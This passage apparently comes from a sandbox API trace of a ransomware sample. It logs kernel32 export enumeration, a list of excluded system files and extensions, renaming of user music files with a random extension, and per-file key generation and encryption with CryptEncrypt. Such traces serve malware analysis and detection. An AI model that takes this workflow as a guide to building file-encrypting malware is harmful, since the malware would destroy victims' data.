lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.571] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.571] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.571] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.571] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.571] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.571] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.571] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.571] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.572] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.572] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.572] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.572] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.572] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.572] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.572] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.572] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.572] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.572] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.572] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.572] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.572] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.572] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.572] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.572] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.572] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.572] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.572] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.572] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.572] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.572] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.572] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.572] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.572] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.572] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.572] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.572] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.572] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.572] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.572] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.572] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.572] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.572] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.572] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.572] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.572] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.572] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.573] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.573] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.573] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.573] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.573] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.573] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.573] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.573] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.573] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.573] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.573] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.573] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.573] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.573] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.573] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.573] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.573] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.573] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\TabxmQAtp.mp3") returned 80 [0085.573] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\TabxmQAtp.mp3.tpQ2HiC") returned 88 [0085.573] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\TabxmQAtp.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\zmvkz0mtr2byj\\tabxmqatp.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\TabxmQAtp.mp3.tpQ2HiC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\zmvkz0mtr2byj\\tabxmqatp.mp3.tpq2hic"), dwFlags=0x0) returned 1 [0085.574] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.574] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.574] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.575] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7d68370, ftCreationTime.dwHighDateTime=0x1d4c75c, ftLastAccessTime.dwLowDateTime=0x96e9c720, ftLastAccessTime.dwHighDateTime=0x1d4ceb6, ftLastWriteTime.dwLowDateTime=0x96e9c720, ftLastWriteTime.dwHighDateTime=0x1d4ceb6, nFileSizeHigh=0x0, nFileSizeLow=0x8e29, dwReserved0=0x0, dwReserved1=0x0, cFileName="TabxmQAtp.mp3", cAlternateFileName="TABXMQ~1.MP3")) returned 0 [0085.575] FindClose (in: hFindFile=0x5f8b18 | out: hFindFile=0x5f8b18) returned 1 [0085.575] CloseHandle (hObject=0x428) returned 1 [0085.575] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc0447120, ftCreationTime.dwHighDateTime=0x1d4d2ed, ftLastAccessTime.dwLowDateTime=0xfaeb7030, ftLastAccessTime.dwHighDateTime=0x1d4c974, ftLastWriteTime.dwLowDateTime=0xfaeb7030, ftLastWriteTime.dwHighDateTime=0x1d4c974, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zmVkZ0mtR2bYJ\\", cAlternateFileName="ZMVKZ0~1")) returned 0 [0085.575] FindClose (in: hFindFile=0x5f8c98 | out: hFindFile=0x5f8c98) returned 1 [0085.575] CloseHandle (hObject=0x410) returned 1 [0085.575] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c0c4a70, ftCreationTime.dwHighDateTime=0x1d4c636, ftLastAccessTime.dwLowDateTime=0x732b2930, ftLastAccessTime.dwHighDateTime=0x1d4c6ac, ftLastWriteTime.dwLowDateTime=0x732b2930, ftLastWriteTime.dwHighDateTime=0x1d4c6ac, nFileSizeHigh=0x0, nFileSizeLow=0x1094c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qMEzdi4bO.wav", cAlternateFileName="QMEZDI~1.WAV")) returned 1 [0085.575] lstrcmpiW (lpString1="qMEzdi4bO.wav", lpString2="DECRYPT-FILES.txt") returned 1 [0085.575] lstrcmpiW (lpString1="qMEzdi4bO.wav", lpString2="autorun.inf") returned 1 [0085.575] lstrcmpiW (lpString1="qMEzdi4bO.wav", lpString2="boot.ini") returned 1 [0085.575] lstrcmpiW (lpString1="qMEzdi4bO.wav", lpString2="desktop.ini") returned 1 [0085.575] lstrcmpiW (lpString1="qMEzdi4bO.wav", lpString2="ntuser.dat") returned 1 [0085.575] lstrcmpiW (lpString1="qMEzdi4bO.wav", lpString2="iconcache.db") returned 1 [0085.575] lstrcmpiW (lpString1="qMEzdi4bO.wav", lpString2="bootsect.bak") returned 1 [0085.575] lstrcmpiW (lpString1="qMEzdi4bO.wav", lpString2="ntuser.dat.log") returned 1 [0085.575] lstrcmpiW (lpString1="qMEzdi4bO.wav", lpString2="thumbs.db") returned -1 [0085.575] lstrcmpiW (lpString1="qMEzdi4bO.wav", lpString2="Bootfont.bin") returned 1 [0085.575] lstrlenW (lpString="qMEzdi4bO.wav") returned 13 [0085.575] lstrcmpiW (lpString1="wav", lpString2="lnk") returned 1 [0085.575] lstrcmpiW (lpString1="wav", lpString2="exe") returned 1 [0085.575] lstrcmpiW (lpString1="wav", lpString2="sys") returned 1 [0085.575] lstrcmpiW (lpString1="wav", lpString2="dll") returned 1 [0085.575] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 36 [0085.576] lstrlenW (lpString="qMEzdi4bO.wav") returned 13 [0085.576] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0085.576] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="qMEzdi4bO.wav" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qMEzdi4bO.wav") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qMEzdi4bO.wav" [0085.576] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.576] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qMEzdi4bO.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qmezdi4bo.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0085.576] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=67916) returned 1 [0085.576] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0085.576] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.576] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.576] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.576] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.577] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0085.577] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0085.578] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.579] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.579] CloseHandle (hObject=0x414) returned 1 [0085.579] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.580] WriteFile (in: hFile=0x410, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0085.580] CloseHandle (hObject=0x0) returned 0 [0085.580] CloseHandle (hObject=0x410) returned 1 [0085.580] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.581] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.581] GetTickCount () returned 0x114dda3 [0085.581] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.581] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.581] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.581] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.582] lstrlenA (lpString="kernel32.dll") returned 12 [0085.582] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.582] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.582] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.582] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.582] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.582] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.582] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.582] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.582] lstrlenA (lpString="ADDATOMA") returned 8 [0085.582] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.582] lstrlenA (lpString="ADDATOMW") returned 8 [0085.582] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.582] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.582] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.582] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.582] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.582] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.582] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.582] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.582] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.582] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.582] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.582] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.582] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.582] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.582] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.582] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.583] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.583] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.583] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.583] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.583] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.583] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.583] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.583] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.583] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.583] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.583] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.583] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.583] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.583] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.583] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.583] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.583] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.583] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.583] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.583] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.583] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.583] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.583] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.583] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.583] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.583] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.583] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.583] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.583] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.583] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.583] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.583] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.583] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.583] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.583] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.583] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.583] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.583] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.584] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.584] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.584] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.584] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.584] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.584] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.584] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.584] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.584] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.584] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.584] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.584] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.584] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.584] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.584] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.584] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.584] lstrlenA 